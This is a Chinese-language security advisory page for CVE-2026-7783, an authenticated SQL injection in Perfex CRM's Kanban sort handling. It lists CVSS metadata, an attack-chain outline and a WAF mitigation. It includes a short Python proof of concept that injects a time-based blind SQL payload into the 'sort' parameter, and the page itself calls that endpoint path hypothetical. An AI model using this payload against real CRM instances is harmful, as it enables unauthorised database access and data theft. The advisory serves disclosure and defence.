IPBUF安全漏洞报告
English
CVE-2026-7783 CVSS 6.3 中危

CVE-2026-7783 Perfex CRM远程SQL注入漏洞

披露日期: 2026-05-05

漏洞信息

漏洞编号
CVE-2026-7783
漏洞类型
SQL注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
CodeCanyon Perfex CRM

相关标签

SQL注入Perfex CRMCVE-2026-7783Web安全中危漏洞

漏洞概述

CodeCanyon Perfex CRM 3.4.1及以下版本存在SQL注入漏洞。漏洞源于AbstractKanban::applySortQuery函数未对参数进行有效过滤,允许攻击者通过Admin Kanban Endpoint发起远程攻击。利用此漏洞可能导致敏感数据泄露、篡改及服务中断,建议用户尽快修复。

技术细节

该漏洞位于Perfex CRM的application/services/AbstractKanban.php文件中,具体受影响的方法是AbstractKanban::applySortQuery。在处理看板排序请求时,系统直接将用户可控的参数拼接到SQL查询语句中,未进行预编译或转义,导致SQL注入漏洞。由于该漏洞CVSS评分为6.3,攻击复杂度低,且需要低权限即可利用(PR:L),攻击者只需构造包含恶意SQL语句的HTTP请求发送至受影响端点,即可在后端数据库执行任意SQL命令,从而窃取管理员凭证或破坏数据完整性。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行的是CodeCanyon Perfex CRM且版本低于等于3.4.1。
STEP 2
获取访问权限
攻击者注册或获取一个低权限账户(PR:L),以便访问Admin Kanban Endpoint。
STEP 3
漏洞利用
攻击者向AbstractKanban接口发送特制的HTTP请求,在sort参数中注入恶意SQL载荷。
STEP 4
执行攻击
后端数据库执行恶意SQL语句,攻击者进而提取敏感信息或修改数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Conceptual Proof of Concept for CVE-2026-7783 import requests def check_sqli(target_url, session_cookie): """Tests the AbstractKanban sort parameter for SQL injection.""" # Endpoint for Admin Kanban (Hypothetical path based on structure) endpoint = f"{target_url}/admin/kanban/update_sort" # Payload for time-based blind SQL injection # Manipulation of the 'sort' argument triggers the flaw payload = "id ASC; SELECT SLEEP(5)-- -" headers = { "User-Agent": "Mozilla/5.0 (PoC Analyst)", "Cookie": f"ci_session={session_cookie}" } data = { "sort": payload } try: response = requests.post(endpoint, headers=headers, data=data, timeout=10) # If response takes longer than 5 seconds, injection is likely successful if response.elapsed.total_seconds() >= 5: return "[+] Vulnerability Confirmed: SQL Injection triggered." else: return "[-] Vulnerability not detected or patched." except Exception as e: return f"[!] Error: {e}" # Usage # target = "http://perfex-crm-instance.com" # session = "valid_low_priv_user_session_id" # print(check_sqli(target, session))

影响范围

Perfex CRM <= 3.4.1

防御指南

临时缓解措施
建议在WAF层添加针对该参数的SQL注入防御规则,或暂时禁用看板(Kanban)模块的排序功能,直至完成升级。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表